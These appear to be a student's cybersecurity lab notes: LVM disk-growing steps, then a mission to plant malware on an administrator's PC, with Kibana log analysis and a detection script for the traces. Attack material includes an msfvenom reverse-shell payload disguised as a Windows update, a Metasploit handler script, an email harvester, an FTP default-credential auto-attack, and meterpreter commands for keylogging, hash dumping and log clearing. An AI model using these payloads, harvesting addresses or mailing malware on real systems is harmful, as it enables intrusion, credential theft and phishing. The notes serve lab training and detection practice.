Day 24


How to grow the disk (LVM on Ubuntu)
Attach a physical disk, then:
fdisk -l                                 # find the new disk (here /dev/sdc)
fdisk /dev/sdc                           # create one partition and set its type to 8e (Linux LVM)
pvcreate /dev/sdc1                       # register the partition as a physical volume
vgextend /dev/ubuntu-vg /dev/sdc1        # add it to the volume group
vgs                                      # VFree should now show the added capacity
lvextend -L +50G /dev/ubuntu-vg/ubuntu-lv
resize2fs /dev/ubuntu-vg/ubuntu-lv       # grow the ext4 filesystem to fill the LV (lvextend -r does both steps at once)
df -h                                    # confirm the mounted filesystem got bigger
Note: the original sequence ran mkfs.ext4 /dev/sdc1 before pvcreate. That step is unnecessary and misleading: the filesystem lives on the logical volume, not on the new partition, and pvcreate will only ask to wipe the stray ext4 signature it finds there.

Mission
Build malware and get it onto the administrator's PC
The attacker harvests the email addresses stored on web2.st.kr and automatically mails the people in charge
Analyse the packets and logs to find the traces of the malware intrusion

msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=7777 -b "\x00" -f exe -o /home/kali/windows_update_20250120001.exe

Regular expressions
A regular expression uses characters, symbols and metacharacters to find, replace or extract strings that satisfy a given condition.
For example, it can validate email addresses, phone numbers or date formats, or pull out text that matches a particular pattern.

Creating Attack.py
class Attack:
    def __init__(self, target):
        print("attack start")
        self.target = target
        print(target)

    def http(self):          # the original was missing the colon here
        print("attack http")
        print(self.target)
class = variables + functions

Create the class and write __init__ as its constructor (initialisation).
The url is passed in when the object is created and handed to __init__, which receives it as target and stores it as self.target.
A class method is defined like an ordinary function, but its first parameter must be 'self'.
Inside the methods that follow, self gives access to self.target.

import re
import requests
from bs4 import BeautifulSoup   # pip install beautifulsoup4; the original omitted this import

Inspect the response object with dir(response) to see what it offers, e.g. response.text.

url = "http://web2.st.kr"        # the target from the mission

# HTTP request
response = requests.get(url)
if response.status_code == 200:
    soup = BeautifulSoup(response.text, 'html.parser')

    # email address pattern ({2,} = TLD of two or more letters; the original had the typo {2.})
    email_pattern = r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}'
    emails = re.findall(email_pattern, soup.text)

    # remove duplicates and print
    unique_emails = set(emails)
    for email in unique_emails:
        print(email)
else:
    print(f"Failed to access {url}, status code: {response.status_code}")
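The snippet above only works against a live site and misses two things a harvester runs into: addresses that appear only inside mailto: links (they are not part of soup.text) and asset names such as logo@2x.png that satisfy the pattern but are not mailboxes. The following is an added example written for this page, not course code, that runs offline on a constructed sample page using only the standard library. The {2,} quantifier is the corrected form of the page's pattern; the mailto handling, the lower-casing and the file-extension filter are assumptions of this example.

```python
import re
from html.parser import HTMLParser

# The page's character classes, with the {2,} quantifier the original mistyped as {2.};
# the \b anchors stop a match from starting or ending in the middle of a word.
EMAIL_RE = re.compile(r"\b[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}\b")

# Heuristic (an assumption of this example): names like logo@2x.png satisfy the pattern
# but are asset files, so drop candidates whose last label is a common file extension.
ASSET_SUFFIXES = {"png", "jpg", "jpeg", "gif", "svg", "css", "js"}


class TextAndMailto(HTMLParser):
    """Collect the visible text plus mailto: targets, which a regex over soup.text misses."""

    def __init__(self):
        super().__init__()
        self.chunks, self.mailto = [], []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value and value.lower().startswith("mailto:"):
                    # drop any ?subject=... query part after the address
                    self.mailto.append(value[len("mailto:"):].split("?", 1)[0])

    def handle_data(self, data):
        self.chunks.append(data)


def extract_emails(html):
    """Return the unique, lower-cased addresses found in an HTML document."""
    parser = TextAndMailto()
    parser.feed(html)
    candidates = EMAIL_RE.findall(" ".join(parser.chunks)) + parser.mailto
    found = set()
    for cand in candidates:
        cand = cand.lower()          # Admin@ and admin@ are the same mailbox
        if cand.rsplit(".", 1)[-1] in ASSET_SUFFIXES or not EMAIL_RE.fullmatch(cand):
            continue
        found.add(cand)
    return sorted(found)


# Constructed sample page; nothing here was fetched from web2.st.kr.
SAMPLE_HTML = """
<html><body>
<h1>Contact</h1>
<p>Admin: <a href="mailto:Admin@web2.st.kr?subject=hello">mail the admin</a></p>
<p>Support: support@web2.st.kr, billing@Web2.st.kr.</p>
<p>Banner image: logo@2x.png</p>
</body></html>
"""

if __name__ == "__main__":
    for email in extract_emails(SAMPLE_HTML):
        print(email)
```

To run it against a real page, feed response.text from requests.get(url) to extract_emails instead of SAMPLE_HTML; the parser does the tag stripping that BeautifulSoup did in the original.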

Log analysis
elastic - kibana - packetbeat
Filter on user_agent.original : python-requests (in KQL, user_agent.original : python-requests* matches the full value, e.g. python-requests/2.31.0)
* The requests are coming from Python, not from a browser: a scripting-library User-Agent walking the pages that list staff addresses is the trace of the harvesting.
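The Kibana filter above is a one-field search. As an added example (not part of the course notes), the same rule as code over constructed packetbeat-style HTTP events in ECS layout, so that it can be run without an Elastic stack: it groups requests by client and User-Agent, keeps only scripting-library agents, and reports those that touched several pages. The event lines, the IP addresses and the list of non-browser User-Agent prefixes beyond python-requests are assumptions of this example.

```python
import json
from collections import defaultdict

# User-Agent prefixes of scripting libraries rather than browsers. python-requests is the
# value the page observed in Kibana; the others are assumptions added for this example.
SCRIPTED_UA_PREFIXES = ("python-requests", "python-urllib", "curl/", "wget/", "go-http-client")

# Constructed packetbeat-style HTTP events (ECS field layout) as NDJSON; not real traffic.
RAW_EVENTS = r"""
{"@timestamp":"2025-01-20T09:00:01Z","source":{"ip":"192.168.56.101"},"url":{"path":"/"},"user_agent":{"original":"python-requests/2.31.0"},"http":{"response":{"status_code":200}}}
{"@timestamp":"2025-01-20T09:00:01Z","source":{"ip":"192.168.56.101"},"url":{"path":"/contact"},"user_agent":{"original":"python-requests/2.31.0"},"http":{"response":{"status_code":200}}}
{"@timestamp":"2025-01-20T09:00:02Z","source":{"ip":"192.168.56.101"},"url":{"path":"/about"},"user_agent":{"original":"python-requests/2.31.0"},"http":{"response":{"status_code":200}}}
{"@timestamp":"2025-01-20T09:00:02Z","source":{"ip":"192.168.56.101"},"url":{"path":"/staff"},"user_agent":{"original":"python-requests/2.31.0"},"http":{"response":{"status_code":200}}}
{"@timestamp":"2025-01-20T09:01:10Z","source":{"ip":"192.168.56.50"},"url":{"path":"/"},"user_agent":{"original":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/121.0"},"http":{"response":{"status_code":200}}}
{"@timestamp":"2025-01-20T09:01:12Z","source":{"ip":"192.168.56.50"},"url":{"path":"/contact"},"user_agent":{"original":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/121.0"},"http":{"response":{"status_code":200}}}
{"@timestamp":"2025-01-20T09:02:00Z","source":{"ip":"10.0.0.5"},"url":{"path":"/"},"user_agent":{"original":"curl/8.5.0"},"http":{"response":{"status_code":200}}}
{"@timestamp":"2025-01-20T09:02:30Z","source":{"ip":"10.0.0.9"},"url":{"path":"/contact"},"user_agent":{},"http":{"response":{"status_code":200}}}
""".strip().splitlines()


def field(doc, dotted):
    """Read a nested ECS field such as user_agent.original; None when absent."""
    cur = doc
    for part in dotted.split("."):
        if not isinstance(cur, dict) or part not in cur:
            return None
        cur = cur[part]
    return cur


def is_scripted_client(ua):
    if not ua:
        return True   # browsers always send a User-Agent; a missing one is suspicious too
    return ua.lower().startswith(SCRIPTED_UA_PREFIXES)


def find_harvesters(ndjson_lines, min_hits=3):
    """Group HTTP events by (client IP, User-Agent), keep scripted clients, and return
    those with at least min_hits requests as (ip, ua, hits, sorted paths) tuples."""
    per_client = defaultdict(lambda: {"paths": set(), "hits": 0})
    for line in ndjson_lines:
        doc = json.loads(line)
        ua = field(doc, "user_agent.original")
        if not is_scripted_client(ua):
            continue
        key = (field(doc, "source.ip"), ua or "<none>")
        per_client[key]["hits"] += 1
        per_client[key]["paths"].add(field(doc, "url.path"))
    return sorted(
        (ip, ua, info["hits"], sorted(info["paths"]))
        for (ip, ua), info in per_client.items()
        if info["hits"] >= min_hits
    )


if __name__ == "__main__":
    for ip, ua, hits, paths in find_harvesters(RAW_EVENTS):
        print(f"{ip} {ua}: {hits} requests to {paths}")
```

The threshold separates a one-off curl from a crawl; lowering min_hits to 1 lists every non-browser client, which is the equivalent of the plain Kibana filter.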

Mission 2
Write attack code that scans a host and then attacks each open port automatically
1. Scan
2. Find the open ports
3. If 80 is open, run the http attacks
    login (brute-force) attack
    file upload attack
    SQL injection attack
    XSS attack
4. If 22 is open, run the ssh attack
5. If 21 is open, run the ftp attack

Create a scan function; the ports from the ports list that turn out to be open go into chkPorts.
for port in chkPorts:
Each port in chkPorts that matches a known number triggers its branch, e.g.
if port == 21:
    attack1.ftp()

FTP connection
    def ftp(self):
        id = "web2"
        pw = "123456"
        ftp = FTP()              # needs: from ftplib import FTP at the top of Attack.py
        print("attack ftp")
        print(self.target)
        print(ftp)
        #print(dir(ftp))
        try:
            ftp.connect(self.target, 21)
            ftp.login(id, pw)
            print("ok")
        except Exception as e:
            print(e)             # the original wrote print({e}), which prints a one-element set instead of the message

ftp = "web2.st.kr"
attack1 = Attack(ftp)
chkPorts = attack1.scan()        # scan() is the method described above; it returns the open ports
for port in chkPorts:
    if port == 21:
        attack1.ftp()
    elif port == 80:
        attack1.http()
        attack1.upload()         # upload, brute, sql and xss are the remaining Attack methods to write
        attack1.brute()
        attack1.sql()
        attack1.xss()
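The driver above dispatches with an if/elif chain and its scan() method is only described, not shown. The following added example, written for this page and not part of the course's Attack.py, covers both the class design from the Attack.py section and the scan-then-dispatch loop of mission 2: a TCP connect scan, a port-to-handler table, a real ftplib login using the web2 / 123456 pair from the page, and an HTTP GET. So that it runs offline, it starts a tiny fake FTP server and HTTP server on 127.0.0.1 (ephemeral ports, chosen at run time) and leaves a third port closed to show that closed ports are never dispatched; the fake services, their ports and the demo wiring are assumptions of this example.

```python
import socket
import socketserver
import threading
from ftplib import FTP, error_perm
from http.client import HTTPConnection
from http.server import BaseHTTPRequestHandler, HTTPServer


class Attack:
    """Scan the target, then run the handler registered for each open port."""

    def __init__(self, target, services):
        self.target = target
        self.services = services   # port -> handler name, e.g. {21: "ftp", 80: "http"}
        self.results = {}          # handler name -> outcome

    def scan(self, timeout=0.5):
        """TCP connect scan: a port is open when connect() succeeds."""
        open_ports = []
        for port in sorted(self.services):
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.settimeout(timeout)
                if s.connect_ex((self.target, port)) == 0:
                    open_ports.append(port)
        return open_ports

    def run(self):
        open_ports = self.scan()
        for port in open_ports:
            getattr(self, self.services[port])(port)   # table lookup replaces the if/elif chain
        return open_ports

    def ftp(self, port, user="web2", password="123456"):
        """Default-credential check with the web2 / 123456 pair from the page."""
        ftp = FTP()
        try:
            ftp.connect(self.target, port, timeout=2)
            ftp.login(user, password)
            self.results["ftp"] = "login ok"
        except error_perm as e:        # 530: the server answered, the credentials are wrong
            self.results["ftp"] = f"login rejected: {e}"
        except OSError as e:           # refused, reset or timed out
            self.results["ftp"] = f"connect failed: {e}"
        finally:
            ftp.close()

    def http(self, port):
        conn = HTTPConnection(self.target, port, timeout=2)
        conn.request("GET", "/")
        self.results["http"] = f"status {conn.getresponse().status}"
        conn.close()


# Constructed local stand-ins for the target's services so the demo runs offline.
class FakeFtp(socketserver.StreamRequestHandler):
    """Speaks just enough FTP for USER/PASS and accepts only web2 / 123456."""
    def handle(self):
        self.wfile.write(b"220 fake ftp\r\n")
        user = None
        while True:
            line = self.rfile.readline().decode().strip()
            if not line:                       # client hung up
                return
            cmd, _, arg = line.partition(" ")
            if cmd.upper() == "USER":
                user = arg
                self.wfile.write(b"331 password please\r\n")
            elif cmd.upper() == "PASS":
                ok = (user, arg) == ("web2", "123456")
                self.wfile.write(b"230 logged in\r\n" if ok else b"530 login failed\r\n")
            else:                              # QUIT or anything unsupported
                self.wfile.write(b"221 bye\r\n")
                return


class FakeHttp(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"ok")

    def log_message(self, *args):              # keep the demo output quiet
        pass


def _serve(server):
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server.server_address[1]


def _closed_port():
    with socket.socket() as s:                 # bind and release: nothing listens here afterwards
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def run_demo():
    ftp_srv = socketserver.TCPServer(("127.0.0.1", 0), FakeFtp)
    http_srv = HTTPServer(("127.0.0.1", 0), FakeHttp)
    # the "ssh" port is closed on purpose: scan() must skip it, so no ssh handler is needed
    services = {_serve(ftp_srv): "ftp", _serve(http_srv): "http", _closed_port(): "ssh"}
    attack = Attack("127.0.0.1", services)
    open_ports = attack.run()
    for srv in (ftp_srv, http_srv):
        srv.shutdown()
        srv.server_close()
    return len(open_ports), attack.results
```

Call run_demo() to see two open ports and the ftp/http outcomes. Against a real host the services table would be {21: "ftp", 22: "ssh", 80: "http"} and the target the hostname; adding a new attack is then one method plus one table entry, with no change to run().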

Malware infiltration
Email
What is the attacker's next move?

Find the administrator's password with a keylogger or screen capture
Build the malware
Send the malware automatically to the collected email addresses

malware.rc
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.56.101
set lport 7777
exploit

msfconsole -r /home/kali/malware.rc

meterpreter commands
Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    detach                    Detach the meterpreter session (for http/https)
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    migrate                   Migrate the server to another process
    pivot                     Manage pivot listeners
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    secure                    (Re)Negotiate TLV packet encryption on the session
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session
    ssl_verify                Modify the SSL certificate verification setting
    transport                 Manage the transport mechanisms
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel


Stdapi: File system Commands
============================

    Command                   Description
    -------                   -----------
    cat                       Read the contents of a file to the screen
    cd                        Change directory
    checksum                  Retrieve the checksum of a file
    cp                        Copy source to destination
    del                       Delete the specified file
    dir                       List files (alias for ls)
    download                  Download a file or directory
    edit                      Edit a file
    getlwd                    Print local working directory (alias for lpwd)
    getwd                     Print working directory
    lcat                      Read the contents of a local file to the screen
    lcd                       Change local working directory
    ldir                      List local files (alias for lls)
    lls                       List local files
    lmkdir                    Create new directory on local machine
    lpwd                      Print local working directory
    ls                        List files
    mkdir                     Make directory
    mv                        Move source to destination
    pwd                       Print working directory
    rm                        Delete the specified file
    rmdir                     Remove directory
    search                    Search for files
    show_mount                List all mount points/logical drives
    upload                    Upload a file or directory

Stdapi: Networking Commands
===========================

    Command                   Description
    -------                   -----------
    arp                       Display the host ARP cache
    getproxy                  Display the current proxy configuration
    ifconfig                  Display interfaces
    ipconfig                  Display interfaces
    netstat                   Display the network connections
    portfwd                   Forward a local port to a remote service
    resolve                   Resolve a set of host names on the target
    route                     View and modify the routing table

Stdapi: System Commands
=======================

    Command                   Description
    -------                   -----------
    clearev                   Clear the event log
    drop_token                Relinquishes any active impersonation token.
    execute                   Execute a command
    getenv                    Get one or more environment variable values
    getpid                    Get the current process identifier
    getprivs                  Attempt to enable all privileges available to the current process
    getsid                    Get the SID of the user that the server is running as
    getuid                    Get the user that the server is running as
    kill                      Terminate a process
    localtime                 Displays the target system local date and time
    pgrep                     Filter processes by name
    pkill                     Terminate processes by name
    ps                        List running processes
    reboot                    Reboots the remote computer
    reg                       Modify and interact with the remote registry
    rev2self                  Calls RevertToSelf() on the remote machine
    shell                     Drop into a system command shell
    shutdown                  Shuts down the remote computer
    steal_token               Attempts to steal an impersonation token from the target process
    suspend                   Suspends or resumes a list of processes
    sysinfo                   Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

    Command                   Description
    -------                   -----------
    enumdesktops              List all accessible desktops and window stations
    getdesktop                Get the current meterpreter desktop
    idletime                  Returns the number of seconds the remote user has been idle
    keyboard_send             Send keystrokes
    keyevent                  Send key events
    keyscan_dump              Dump the keystroke buffer
    keyscan_start             Start capturing keystrokes
    keyscan_stop              Stop capturing keystrokes
    mouse                     Send mouse events
    screenshare               Watch the remote user desktop in real time
    screenshot                Grab a screenshot of the interactive desktop
    setdesktop                Change the meterpreters current desktop
    uictl                     Control some of the user interface components


Stdapi: Webcam Commands
=======================

    Command                   Description
    -------                   -----------
    record_mic                Record audio from the default microphone for X seconds
    webcam_chat               Start a video chat
    webcam_list               List webcams
    webcam_snap               Take a snapshot from the specified webcam
    webcam_stream             Play a video stream from the specified webcam


Stdapi: Audio Output Commands
=============================

    Command                   Description
    -------                   -----------
    play                      play a waveform audio file (.wav) on the target system

Priv: Elevate Commands
======================

    Command                   Description
    -------                   -----------
    getsystem                 Attempt to elevate your privilege to that of local system.


Priv: Password database Commands
================================

    Command                   Description
    -------                   -----------
    hashdump                  Dumps the contents of the SAM database


Priv: Timestomp Commands
========================

    Command                   Description
    -------                   -----------
    timestomp                 Manipulate file MACE attributes